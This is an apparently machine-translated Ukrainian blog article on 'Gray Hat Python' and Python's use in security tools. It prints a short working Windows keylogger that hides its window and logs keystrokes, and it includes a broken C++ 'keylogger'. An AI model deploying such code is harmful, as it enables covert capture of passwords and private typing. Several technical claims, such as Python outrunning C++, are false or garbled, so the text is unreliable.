Gray Hat Python - Отже, два роки тому я займався дослідженнями мов програмування, я почав читати про C, C ++, Assembly, Python та Ruby. Я хотів стати експертом з кібербезпеки. Отже, я почав вчитися стільки, скільки можу. Почавши з C, C ++ та C #, що є основою, і після вивчення та компіляції багатьох програм та вірусів я нарешті почав вивчати Kali Linux. Для тих, хто не знає, що таке Kali Linux, це операційна система для проникнення. Отже, я продовжував займатися, і я побачив, що більшість програм, вірусів і троянців були зібрані в Python, а їх базою була Ruby.

Отже, я на даний момент припинив своє навчання і почав вивчати Python або бути точним Grey Hat Python і тадая … Це було надзвичайно просто в порівнянні з C, C # або будь-якою іншою мовою, яку я вивчив. Нарешті я дізнався, чому саме Python була найбільш вживаною мовою та як вона стала відомою.
Отже, сьогодні я б обговорював, як Python перетворився на Gray Hat Python і чому він настільки широко використовується, що навіть Google і YouTube використовують його у своїй базі даних, щоб дати максимально точні результати пошуку.

Починаючи з цього, Python - мова програмування високого рівня, а це означає, що його синтаксиси читаються надзвичайно просто, навіть для початківців. Якщо ви новачок у програмуванні, це була б мова, з якої я б запропонував вам почати. Дозвольте навести приклад:

Ось як це виглядає в C: -

#include

int main()
(
printf("Hello world\n");
return 0;
)

Ось як це виглядає на Java: -

class HelloWorld
(
public static void main (String args())
(
System.out.println ("Hello World");
)
)

І ось, як це виглядає в Python (v2.7)

print "Hello World"

Простий? Так. Отже, Python був не лише простим у написанні та розумінні, але й дуже компактним. Отже, вам може бути цікаво, як це призвело до Сірого Хет-Пітона?

Рекомендовані курси

  • Навчання IP-маршрутизації
  • Навчальний курс
  • Повне навчання RMAN
  • Навчання програмуванню Python

Python проти сірого капелюху Python

Отже, що саме таке Сірий Капелюх Пітон? Чому він так відрізняється від нашого звичайного Python? Справа в тому, що Grey Hat Python - це не що інше, як програми, написані на Python хакерами, тестерами мережевого стресу та Reverse Engineers для створення або розлому програми. Але термін "Сірий капелюх" використовується, оскільки це не зовсім вигідне або користувацьке програмне забезпечення. Він використовується для захисту або створення програмного забезпечення, що порушує безпеку.

Його можна легко використовувати як для тестування обмежень безпечного середовища, так і для прориву в безпечне середовище. Ось що означає Сірий Капелюх. І набагато простіше це зробити в Python, ніж робити це на C, C ++ або java. Таким чином назва Сірий Капелюх Пітон. Кілька прикладів, про які я можу придумати:

• Написання реєстраторів ключів (для хакерів та пентестерів)
• Написання скриптів оболонки безпеки (для мережевих адміністраторів)
• Написання автоматизованої IDS (системи виявлення вторгнень для інженерів з безпеки)

Отже, тепер ви знаєте, чому і чим корисний Gray Hat Python. Щоб детальніше розглянути це, дозвольте навести кілька детальних прикладів.
Можливо, ви чули про Google App Engine. Google App Engine спочатку був розроблений в Python до того, як він був перенесений на нього. Google App - це належний приклад програми, написаної на Python, оскільки вона дозволяє створювати веб-додатки, використовуючи високу колекцію багатих колекцій бібліотек, інструментів та рамок.

Ніколи не замислювалися, чому так просто шукати щось у Google? Більшість випадків ви отримуєте результати пошуку, які на 80% точні. Це тому, що Python надзвичайно гнучкий, працює з високою швидкістю, а бази даних набагато компактніші, хоча він зберігає «n» кількість інформації. Python настільки розширюваний, що навіть YouTube використовує його для таких цілей, як перегляд відео, контроль шаблонів, адміністрування відео, доступ до канонічних даних та багато іншого.

У Google є свої сканери та павуки, які збирають дані, як тільки вони завантажуються в Інтернет, незалежно від того, де або наскільки це безпечно. Для збору цієї інформації потрібно лише належне натхнення, час та знання.

Пошуки Google раніше ґрунтувалися на Python, який згодом змінив на C ++ для оптимізації швидкості, оскільки сканери Google сканують багато сторінок в секунду, і кожна з них займає кілька хвилин, щоб успішно сканувати. Python, в даний час набагато швидше, ніж C ++, але це був не той самий випадок кілька десятиліть тому.

Була відома Цитата, яку цитував Google: -
"Python, де ми можемо, C ++ там, де треба".

Отже, вам може бути цікаво, як це можна використовувати для злому, переказів та безпеки мережі. Дозволю собі не погодитися. Якщо ви могли б створити програму, яка на 70% -80% точна для отримання ефективних результатів пошуку, ви, ймовірно, можете створити додаток, який може підключати веб-сайти, розумно шукати та створювати профіль людини, який може скоріше використовувати індивідуальні чорні капелюхи в зловмисних цілях. Залиште людей осторонь, той, хто досить розумний, може легко створити додаток для створення профілю компанії, цілого дерева від кореня до того, що ви можете придумати …

Збір інформації через Мальтего

Ви можете думати, що я трохи перебільшую. Ні, я НЕ!

Придумайте такі приклади, як Мальтего. Maltego - це програмне забезпечення, або я можу краще переосмислити його як додаток до криміналістики з відкритим кодом, створений для збору інформації та формування профілю людей, компанії та інших корпоративних агентств.

Потрібно просто ввести належні дані у додаток, а решта речей, як зв’язування електронної пошти, людей, групи людей, навіть визначення інтернет-інфраструктури, наприклад домени, імена DNS, Netblocks та IP-адреси, можуть бути пов’язані та пов’язані між собою за допомогою цієї розвідки з відкритим кодом. .

Для отримання додаткової інформації відвідайте, щоб знати, що таке Мальтего?

Отже, якщо доступ до "Секретної інформації" визначає ваш успіх, тоді Мальтего може допомогти вам розкрити її. Maltego частково написаний на Python і також використовує Java, що знову є чудовою мовою.

Стільки цитувати про безпеку від Google. Якщо точніше, Google - це найменший спосіб, коли ви можете залишати себе анонімними в Інтернеті, не важливо, чи використовуєте ви інкогніто чи www.duckduckgo.com від chrome. Тому що в кінцевому підсумку все оновлюється в Інтернеті. Справа тут у тому, що справа не в невразливості, а в абсолютній вразливості. Не можна повністю стерти себе з Інтернету. Але можна, безумовно, спробувати зберегти якомога менше інформації в Мережі.

Python - це не просто мова, це мова сценаріїв. Мови сценаріїв дозволяють писати, змінювати власні інструменти, коли вам потрібно щось більше на замовлення. Ці інструменти мережевої безпеки значною мірою залежать від мови сценаріїв для розширення. Наприклад, візьмемо Скапі.

Скапі чисто написаний на Python. Це потужний інтерактивний інструмент для маніпулювання пакетом. Він може генерувати підроблені пакети самостійно, сканувати мережі і навіть може нюхати пакети в мережі.

Знайдіть детальну інформацію про те, що таке Скапі?

Зараз це складні програми, написані передовими програмістами. Подивимось, як просто написати програму на Python, яку легко зрозуміти людям, які мають хороші основи програмування.

Це кейлоггер, написаний на Python:

#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window, 0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file, "a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)

proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input

Отже, це набагато більш просто, якщо ви запитаєте мене. Я просто додав модулі pyhook, Pythoncom, win32gui та win32console, які ви можете легко завантажити з веб-сайту sourceforge, і я згадав коментарі за допомогою хеш-тегу. Але якщо мені доведеться писати ту саму програму на C ++, давайте подивимось, наскільки важко це може бути.

Це програма, написана на C ++: -

 #include #include #include #include int main(int argc, char ** agrv)( using namepace std; /*Easier*/ char std::vector input_STRUCT = ("S", "T", "O"); char std::vector input_STRUCT_1 = ("P", ""); char std::vector input_STRUCT_2 = ("L", "O", "O", "K", "I", "N", "G"); char std::vector input_STRUCT_3 = ("", "F", "O", "R"); char std::vector input_STRUCT_4 = ("M", "A", "L", "W"); char std::vector input_STRUCT_5 = ("A", "R", "E"); ostream os("C:\users\keylogger.txt"); int i; for( i = 0; i <=2; i++)( os << input_STRUCT(i); for(;i <= 1000000 ;i++)( ) ) for( i=0; i<=1;i++)( os << input_STRING_1(i); for(;i <= 1000000 ;i++)( ) ) for(i=0; i<=6; i++) ( os << input_STRING_2 (i); for(; i <= 1000000 ; i++)( ) for(i=0; i<=3;i++)( os << input_STRING_3(i); for(; i <= 1000000 ;i++)( ) ) for(i=0; i<=3; i++)( os << input_STRING_4(i); for(;i <= 1000000 ; i++)( ) ) for(i=0; i<=2; i++)( os << input_STRING_5(i); for(;i <= 1000000 ; i++)( ) ) os.close(); istream is (" C:\users\keylogger.txt "); cout << is; return 0; )

Отже, це досить велике порівняно з Python. А якщо говорити про ефективність, то Python можна легко скласти у виконуваний файл без будь-яких зусиль, використовуючи програмне забезпечення py2exe. Якщо я кажу про C ++, то, чесно кажучи, цей код - жарт. Щоб написати належний реєстратор ключів, потрібно написати DLL, який реалізує гак WH_KEYBOARD. Крім того, для початківців цей код далеко не простий для розуміння.

Злом з відкритим кодом

Тепер це піклується про хакерів Black Hat, які точніше - це люди, які мають намір знищити, маніпулювати даними для власних потреб. Якщо говорити з точки зору стурбованості безпеки, Python також корисний для хакерів White Hat, які мають намір врятувати суспільство від нападу зловмисних хакерів. Якщо ви хочете розвинути кар'єру або хоча б хочете навчитися Python для дослідження безпеки, то ви, безсумнівно, можете заглибитися в OWASP, BRO або Quick NIX Secure Script.

OWASP - проект безпеки веб-додатків. OWASP спрямований на створення більш захищеної версії Python, яка полегшить професіоналам безпеки та розробникам написання програмного забезпечення менш схильним до атаки з боку хакерів. Він пов'язаний з аналізом Black-Box, виявленням та вирішенням проблем, пов’язаних із безпекою, які можуть впливати на інтерактивного інтерпретатора Python.

BRO - це мережева програма моніторингу безпеки та руху, тоді як Quick NIX використовується для посилення та захисту прав власності на файли на ходу.

Оскільки ми говоримо про безпеку, поговоримо про операційну систему, яка частково базується на Python. Python чудово працює з UNIX, LINUX та Debian. Однією з найвідоміших операційних систем була Backtrack 5. Були випущені різні версії. Він був спеціально розроблений для PenTesting. Пізніше люди з "Наступальної безпеки" подумали, що Backtrack потребує перезавантаження, тому що більшість інструментів або не працюють належним чином, або не підтримуються.

Пізніше вони випустили Kali Linux, який повністю базувався на Debian. І більшість його фреймворків є або в Ruby, або в Python. Рубі теж дивовижна сценарна мова. Але я б у будь-який час віддав перевагу Python через це, тому що Python має більш різноманітне співтовариство з Linux та його більш прямий та легкий налагодження. Хоча Рубі, хоча має багато функцій і швидко адаптується до навколишнього середовища, може бути важким для налагодження, важко читати і є більш складним, ніж Python.

Найкращим прикладом може бути порівняння Apple з Linux або Порівняння iphone з Android. Apple багата на ресурси і надзвичайно гладка, і більш упереджена до початківців. Тоді як Linux / Android є більш зручними для користувачів, трохи млявими, і іноді можуть боліти головою, якщо ви не знаєте, як його налаштувати чи підтримувати.

Існує навіть книга, заснована на Злому шапки Python Grey від Джастіна Сейца. Він спеціально займається автоматизацією виснажливих завдань зворотної інженерії та безпеки, розробкою власного налагоджувача, бібліотеки та введення DLL, обнюхуванням безпечного трафіку за зашифрованим сеансом та використанням відладчика імунітету, Саллі та багатьох інших. Це дивовижна книга не має значення, ви початківець чи ви фахівець, ви завжди дізнаєтесь те чи інше, щоразу, коли читаєте його.

Висновок

Отже, якщо ви новачок, Python буде правильним вибором для початку, як ваша перша мова тестування безпеки програмування.

Згадайте одне, врешті-решт, Grey Hat Python - це не просто мова, це спосіб робити речі належним чином та швидко.

Перше джерело зображення: pixabay.com

Схожі статті: -

Ось кілька статей, які допоможуть вам отримати більш детальну інформацію про сірий капелюшний пітон, тому просто перейдіть за посиланням.

  1. Переваги засобів захисту від кібербезпеки, яких ви повинні знати
  2. Кар'єра в Python
  3. Топ-25 запитань та відповідей щодо інтерв'ю Python
  4. Які переваги та обмеження використання Python?
  5. Python vs Node.js
  6. Посібник з питань інтерв'ю з кібербезпекою
  7. Різні типи інструментів для тестування безпеки

Категорія:

Розробка програмного забезпечення